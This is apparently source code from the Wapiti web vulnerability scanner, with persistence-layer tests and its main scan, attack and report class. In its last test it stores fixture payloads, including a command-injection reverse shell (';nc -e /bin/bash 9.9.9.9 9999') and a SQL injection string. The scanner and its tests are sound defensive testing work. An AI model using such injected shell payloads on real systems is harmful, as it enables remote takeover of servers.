def test_persister_upload(): try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlitePersister("/tmp/crawl.db") persister.set_root_url("http://httpbin.org/") simple_upload = Request("http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["file1", ["'fname1", "content"]], ["file2", ["fname2", "content"]]]) xml_upload = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["calendar", ["calendar.xml", "<xml>Hello there</xml"]]]) persister.add_request(simple_upload) persister.add_request(xml_upload) assert persister.count_paths() == 2 stored_requests = set(persister.get_to_browse()) assert simple_upload in stored_requests assert xml_upload in stored_requests for req in stored_requests: if req == simple_upload: assert req.file_params == simple_upload.file_params assert req.file_params[0] == ["file1", ["'fname1", "content"]] assert req.file_params[1] == ["file2", ["fname2", "content"]] else: assert req.file_params == xml_upload.file_params assert req.file_params[0] == [ "calendar", ["calendar.xml", "<xml>Hello there</xml"] ] naughty_file = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["calendar", ["calendar.xml", "<xml>XXE there</xml>"]]]) persister.add_vulnerability(1, "Command Execution", 1, naughty_file, "calendar", "<xml>XXE there</xml>") payload = next(persister.get_payloads()) assert naughty_file == payload.evil_request assert payload.parameter == "calendar"
async def test_persister_upload(): try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlitePersister("/tmp/crawl.db") persister.set_root_url("http://httpbin.org/") simple_upload = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["file1", ("'fname1", "content", "text/plain")], ["file2", ("fname2", "content", "text/plain")]] ) xml_upload = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["calendar", ("calendar.xml", "<xml>Hello there</xml", "application/xml")]] ) persister.add_request(simple_upload) persister.add_request(xml_upload) assert persister.count_paths() == 2 stored_requests = set(persister.get_to_browse()) assert simple_upload in stored_requests assert xml_upload in stored_requests respx.post("http://httpbin.org/post?qs1").mock(return_value=httpx.Response(200, text="Hello there")) crawler = AsyncCrawler("http://httpbin.org/") for req in stored_requests: await crawler.async_send(req) persister.add_request(req) if req == simple_upload: assert req.file_params == simple_upload.file_params assert req.file_params[0] == ["file1", ("'fname1", "content", "text/plain")] assert req.file_params[1] == ["file2", ("fname2", "content", "text/plain")] else: assert req.file_params == xml_upload.file_params assert req.file_params[0] == ["calendar", ("calendar.xml", "<xml>Hello there</xml", "application/xml")] naughty_file = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["calendar", ("calendar.xml", "<xml>XXE there</xml>", "application/xml")]] ) persister.add_vulnerability(1, "Command Execution", 1, naughty_file, "calendar", "<xml>XXE there</xml>") payload = next(persister.get_payloads()) assert naughty_file == payload.evil_request assert payload.parameter == "calendar" assert len(list(persister.get_forms(path="http://httpbin.org/post"))) == 2 await crawler.close()
class Wapiti: """This class parse the options from the command line and set the modules and the HTTP engine accordingly. Launch wapiti without arguments or with the "-h" option for more informations.""" REPORT_DIR = "report" HOME_DIR = os.getenv("HOME") or os.getenv("USERPROFILE") COPY_REPORT_DIR = os.path.join(HOME_DIR, ".wapiti", "generated_report") def __init__(self, root_url, scope="folder", session_dir=None, config_dir=None): self.target_url = root_url self.server = urlparse(root_url).netloc self.crawler = crawler.Crawler(root_url) self.target_scope = scope if scope == "page": self.crawler.scope = crawler.Scope.PAGE elif scope == "folder": self.crawler.scope = crawler.Scope.FOLDER elif scope == "domain": self.crawler.scope = crawler.Scope.DOMAIN elif scope == "punk": self.crawler.scope = crawler.Scope.PUNK else: self.crawler.scope = crawler.Scope.URL self.report_gen = None self.report_generator_type = "html" self.output_file = "" self.urls = [] self.forms = [] self.attacks = [] self.color = 0 self.verbose = 0 self.module_options = None self.attack_options = {} self._start_urls = deque([self.target_url]) self._excluded_urls = [] self._bad_params = set() self._max_depth = 40 self._max_links_per_page = 0 self._max_files_per_dir = 0 self._scan_force = "normal" self._max_scan_time = 0 self._max_attack_time = 0 self._bug_report = True if session_dir: SqlitePersister.CRAWLER_DATA_DIR = session_dir if config_dir: SqlitePersister.CONFIG_DIR = config_dir self._history_file = os.path.join( SqlitePersister.CRAWLER_DATA_DIR, "{}_{}_{}.db".format( self.server.replace(':', '_'), self.target_scope, md5(root_url.encode(errors="replace")).hexdigest()[:8])) if not os.path.isdir(SqlitePersister.CRAWLER_DATA_DIR): os.makedirs(SqlitePersister.CRAWLER_DATA_DIR) self.persister = SqlitePersister(self._history_file) def _init_report(self): self.report_gen = get_report_generator_instance( self.report_generator_type.lower()) self.report_gen.set_report_info(self.target_url, self.target_scope, gmtime(), WAPITI_VERSION) for vul in vulnerabilities: self.report_gen.add_vulnerability_type( vul.NAME, vul.DESCRIPTION, vul.SOLUTION, flatten_references(vul.REFERENCES)) for anomaly in anomalies: self.report_gen.add_anomaly_type( anomaly.NAME, anomaly.DESCRIPTION, anomaly.SOLUTION, flatten_references(anomaly.REFERENCES)) for additional in additionals: self.report_gen.add_additional_type( additional.NAME, additional.DESCRIPTION, additional.SOLUTION, flatten_references(additional.REFERENCES)) def _init_attacks(self): self._init_report() logger = ConsoleLogger() if self.color: logger.color = True print(_("[*] Loading modules:")) modules_list = sorted(module_name[4:] for module_name in attack.modules) print("\t {0}".format(", ".join(modules_list))) for mod_name in attack.modules: try: mod = import_module("wapitiCore.attack." + mod_name) except ImportError: print(_("[!] Could not find module {0}").format(mod_name)) continue mod_instance = getattr(mod, mod_name)(self.crawler, self.persister, logger, self.attack_options) if hasattr(mod_instance, "set_timeout"): mod_instance.set_timeout(self.crawler.timeout) self.attacks.append(mod_instance) self.attacks.sort(key=attrgetter("PRIORITY")) for attack_module in self.attacks: attack_module.set_verbose(self.verbose) if attack_module.name not in attack.commons: attack_module.do_get = False attack_module.do_post = False if self.color == 1: attack_module.set_color() # Custom list of modules was specified if self.module_options is not None: # First deactivate all modules for attack_module in self.attacks: attack_module.do_get = False attack_module.do_post = False opts = self.module_options.split(",") for module_opt in opts: if module_opt.strip() == "": continue method = "" if module_opt.find(":") > 0: module_name, method = module_opt.split(":", 1) else: module_name = module_opt # deactivate some module options if module_name.startswith("-"): module_name = module_name[1:] if module_name in ("all", "common"): for attack_module in self.attacks: if module_name == "all" or attack_module.name in attack.commons: if not method: attack_module.do_get = attack_module.do_post = False elif method == "get": attack_module.do_get = False elif method == "post": attack_module.do_post = False else: found = False for attack_module in self.attacks: if attack_module.name == module_name: found = True if not method: attack_module.do_get = attack_module.do_post = False elif method == "get": attack_module.do_get = False elif method == "post": attack_module.do_post = False if not found: print( _("[!] Unable to find a module named {0}"). format(module_name)) # activate some module options else: if module_name.startswith("+"): module_name = module_name[1:] if module_name in ("all", "common"): for attack_module in self.attacks: if module_name == "all" or attack_module.name in attack.commons: if not method: attack_module.do_get = attack_module.do_post = True elif method == "get": attack_module.do_get = True elif method == "post": attack_module.do_post = True else: found = False for attack_module in self.attacks: if attack_module.name == module_name: found = True if not method: attack_module.do_get = attack_module.do_post = True elif method == "get": attack_module.do_get = True elif method == "post": attack_module.do_post = True if not found: print( _("[!] Unable to find a module named {0}"). format(module_name)) def update(self): """Update modules that implement an update method""" logger = ConsoleLogger() if self.color: logger.color = True for mod_name in attack.modules: mod = import_module("wapitiCore.attack." + mod_name) mod_instance = getattr(mod, mod_name)(self.crawler, self.persister, logger, self.attack_options) if hasattr(mod_instance, "update"): print(_("Updating module {0}").format(mod_name[4:])) mod_instance.update() print(_("Update done.")) def browse(self): """Extract hyperlinks and forms from the webpages found on the website""" for resource in self.persister.get_to_browse(): self._start_urls.append(resource) for resource in self.persister.get_links(): self._excluded_urls.append(resource) for resource in self.persister.get_forms(): self._excluded_urls.append(resource) stopped = False explorer = crawler.Explorer(self.crawler) explorer.max_depth = self._max_depth explorer.max_files_per_dir = self._max_files_per_dir explorer.max_requests_per_depth = self._max_links_per_page explorer.forbidden_parameters = self._bad_params explorer.qs_limit = SCAN_FORCE_VALUES[self._scan_force] explorer.verbose = (self.verbose > 0) explorer.load_saved_state(self.persister.output_file[:-2] + "pkl") self.persister.set_root_url(self.target_url) start = datetime.utcnow() try: for resource in explorer.explore(self._start_urls, self._excluded_urls): # Browsed URLs are saved one at a time self.persister.add_request(resource) if (datetime.utcnow() - start).total_seconds() > self._max_scan_time >= 1: print(_("Max scan time was reached, stopping.")) break except KeyboardInterrupt: stopped = True print(_("[*] Saving scan state, please wait...")) # Not yet scanned URLs are all saved in one single time (bulk insert + final commit) self.persister.set_to_browse(self._start_urls) # Let's save explorer values (limits) explorer.save_state(self.persister.output_file[:-2] + "pkl") print('') print(_(" Note")) print("========") print( _("This scan has been saved in the file {0}").format( self.persister.output_file)) if stopped: print( _("The scan will be resumed next time unless you pass the --skip-crawl option." )) def attack(self): """Launch the attacks based on the preferences set by the command line""" self._init_attacks() for attack_module in self.attacks: start = datetime.utcnow() if attack_module.do_get is False and attack_module.do_post is False: continue print('') if attack_module.require: attack_name_list = [ attack.name for attack in self.attacks if attack.name in attack_module.require and ( attack.do_get or attack.do_post) ] if attack_module.require != attack_name_list: print( _("[!] Missing dependencies for module {0}:").format( attack_module.name)) print(" {0}".format(",".join([ attack for attack in attack_module.require if attack not in attack_name_list ]))) continue attack_module.load_require([ attack for attack in self.attacks if attack.name in attack_module.require ]) attack_module.log_green(_("[*] Launching module {0}"), attack_module.name) already_attacked = self.persister.count_attacked( attack_module.name) if already_attacked: attack_module.log_green( _("[*] {0} pages were previously attacked and will be skipped" ), already_attacked) generator = attack_module.attack() answer = "0" skipped = 0 while True: try: original_request_or_exception = next(generator) if isinstance(original_request_or_exception, BaseException): raise original_request_or_exception if (datetime.utcnow() - start ).total_seconds() > self._max_attack_time >= 1: print( _("Max attack time was reached for module {0}, stopping." .format(attack_module.name))) break except KeyboardInterrupt as exception: print('') print(_("Attack process was interrupted. Do you want to:")) print( _("\tr) stop everything here and generate the (R)eport" )) print(_("\tn) move to the (N)ext attack module (if any)")) print(_("\tq) (Q)uit without generating the report")) print(_("\tc) (C)ontinue the current attack")) while True: try: answer = input("? ").strip().lower() except UnicodeDecodeError: pass if answer not in ("r", "n", "q", "c"): print( _("Invalid choice. Valid choices are r, n, q and c." )) else: break if answer in ("r", "n"): break if answer == "c": continue # if answer is q, raise KeyboardInterrupt and it will stop cleanly raise exception except (ConnectionError, Timeout, ChunkedEncodingError, ContentDecodingError): sleep(1) skipped += 1 continue except StopIteration: break except Exception as exception: # Catch every possible exceptions and print it exception_traceback = sys.exc_info()[2] print(exception.__class__.__name__, exception) print_tb(exception_traceback) if self._bug_report: traceback_file = str(uuid1()) with open(traceback_file, "w") as traceback_fd: print_tb(exception_traceback, file=traceback_fd) print("{}: {}".format(exception.__class__.__name__, exception), file=traceback_fd) print("Occurred in {} on {}".format( attack_module.name, self.target_url), file=traceback_fd) print("{}. Requests {}. OS {}".format( WAPITI_VERSION, requests.__version__, sys.platform)) try: upload_request = Request( "https://wapiti3.ovh/upload.php", file_params=[[ "crash_report", [ traceback_file, open(traceback_file, "rb").read() ] ]]) page = self.crawler.send(upload_request) print( _("Sending crash report {} ... {}").format( traceback_file, page.content)) except RequestException: print(_("Error sending crash report")) os.unlink(traceback_file) else: if original_request_or_exception and original_request_or_exception.path_id is not None: self.persister.set_attacked( original_request_or_exception.path_id, attack_module.name) if hasattr(attack_module, "finish"): attack_module.finish() if skipped: print( _("{} requests were skipped due to network issues").format( skipped)) if answer == "1": break # if self.crawler.get_uploads(): # print('') # print(_("Upload scripts found:")) # print("----------------------") # for upload_form in self.crawler.get_uploads(): # print(upload_form) if not self.output_file: if self.report_generator_type == "html": self.output_file = self.COPY_REPORT_DIR else: filename = "{}_{}".format( self.server.replace(":", "_"), strftime("%m%d%Y_%H%M", self.report_gen.scan_date)) if self.report_generator_type == "txt": extension = ".txt" elif self.report_generator_type == "json": extension = ".json" else: extension = ".xml" self.output_file = filename + extension for payload in self.persister.get_payloads(): if payload.type == "vulnerability": self.report_gen.add_vulnerability(category=payload.category, level=payload.level, request=payload.evil_request, parameter=payload.parameter, info=payload.info) elif payload.type == "anomaly": self.report_gen.add_anomaly(category=payload.category, level=payload.level, request=payload.evil_request, parameter=payload.parameter, info=payload.info) elif payload.type == "additional": self.report_gen.add_additional(category=payload.category, level=payload.level, request=payload.evil_request, parameter=payload.parameter, info=payload.info) self.report_gen.generate_report(self.output_file) print('') print(_("Report")) print("------") print( _("A report has been generated in the file {0}").format( self.output_file)) if self.report_generator_type == "html": print( _("Open {0} with a browser to see this report.").format( self.report_gen.final_path)) # if self.http_engine.sslErrorOccured: # print('') # print(_("Warning: Wapiti came across some SSL errors during the scan, it maybe missed some webpages.")) def set_timeout(self, timeout: float = 6.0): """Set the timeout for the time waiting for a HTTP response""" self.crawler.timeout = timeout def set_verify_ssl(self, verify: bool = False): """Set whether SSL must be verified.""" self.crawler.secure = verify def set_proxy(self, proxy: str = ""): """Set a proxy to use for HTTP requests.""" self.crawler.set_proxy(proxy) def add_start_url(self, url: str): """Specify an URL to start the scan with. Can be called several times.""" self._start_urls.append(url) def add_excluded_url(self, url_or_pattern: str): """Specify an URL to exclude from the scan. Can be called several times.""" self._excluded_urls.append(url_or_pattern) def set_cookie_file(self, cookie: str): """Load session data from a cookie file""" if os.path.isfile(cookie): json_cookie = jsoncookie.JsonCookie() json_cookie.open(cookie) cookiejar = json_cookie.cookiejar(self.server) json_cookie.close() self.crawler.session_cookies = cookiejar def set_auth_credentials(self, auth_basic: tuple): """Set credentials to use if the website require an authentication.""" self.crawler.credentials = auth_basic def set_auth_type(self, auth_method: str): """Set the authentication method to use.""" self.crawler.auth_method = auth_method def add_bad_param(self, param_name: str): """Exclude a parameter from an url (urls with this parameter will be modified. This function can be call several times""" self._bad_params.add(param_name) def set_max_depth(self, limit: int): """Set how deep the scanner should explore the website""" self._max_depth = limit def set_max_links_per_page(self, limit: int): self._max_links_per_page = limit def set_max_files_per_dir(self, limit: int): self._max_files_per_dir = limit def set_scan_force(self, force: str): self._scan_force = force def set_max_scan_time(self, seconds: float): self._max_scan_time = seconds def set_max_attack_time(self, seconds: float): self._max_attack_time = seconds def set_color(self): """Put colors in the console output (terminal must support colors)""" self.color = 1 def verbosity(self, verbose: int): """Define the level of verbosity of the output.""" self.verbose = verbose def set_bug_reporting(self, value: bool): self._bug_report = value def set_attack_options(self, options: dict = None): self.attack_options = options if isinstance(options, dict) else {} def set_modules(self, options=""): """Activate or deactivate (default) all attacks""" self.module_options = options def set_report_generator_type(self, report_type="xml"): """Set the format of the generated report. Can be html, json, txt or xml""" self.report_generator_type = report_type def set_output_file(self, output_file: str): """Set the filename where the report will be written""" self.output_file = output_file def add_custom_header(self, key: str, value: str): self.crawler.add_custom_header(key, value) def flush_attacks(self): self.persister.flush_attacks() def flush_session(self): self.persister.close() try: os.unlink(self._history_file) except FileNotFoundError: pass try: os.unlink(self.persister.output_file[:-2] + "pkl") except FileNotFoundError: pass self.persister = SqlitePersister(self._history_file) def count_resources(self) -> int: return self.persister.count_paths() def has_scan_started(self) -> bool: return self.persister.has_scan_started() def have_attacks_started(self) -> bool: return self.persister.have_attacks_started()
async def test_persister_basic(): url = "http://httpbin.org/?k=v" respx.get(url).mock(return_value=httpx.Response(200, text="Hello world!")) crawler = AsyncCrawler("http://httpbin.org/") try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlitePersister("/tmp/crawl.db") persister.set_root_url("http://httpbin.org/") simple_get = Request("http://httpbin.org/?k=v") simple_post = Request( "http://httpbin.org/post?var1=a&var2=b", post_params=[["post1", "c"], ["post2", "d"]] ) persister.set_to_browse([simple_get, simple_post]) assert persister.get_root_url() == "http://httpbin.org/" assert persister.count_paths() == 2 assert not len(list(persister.get_links())) assert not len(list(persister.get_forms())) assert not len(list(persister.get_payloads())) stored_requests = set(persister.get_to_browse()) assert simple_get in stored_requests assert simple_post in stored_requests # If there is some requests stored then it means scan was started assert persister.has_scan_started() assert not persister.has_scan_finished() assert not persister.have_attacks_started() for req in stored_requests: if req == simple_get: await crawler.async_send(req) # Add the sent request persister.add_request(req) assert req.path_id == 1 assert persister.get_path_by_id(1) == req break # Should be one now as the link was crawled assert len(list(persister.get_links())) == 1 # We still have two entries in paths though as the resource just got updated assert persister.count_paths() == 2 persister.set_attacked(1, "xss") assert persister.count_attacked("xss") == 1 assert persister.have_attacks_started() naughty_get = Request("http://httpbin.org/?k=1%20%OR%200") persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass") assert next(persister.get_payloads()) persister.flush_attacks() assert not persister.have_attacks_started() assert not len(list(persister.get_payloads())) persister.flush_session() assert not persister.count_paths() naughty_post = Request( "http://httpbin.org/post?var1=a&var2=b", post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]] ) persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999") payload = next(persister.get_payloads()) persister.close() assert naughty_post == payload.evil_request assert payload.parameter == "post2" await crawler.close()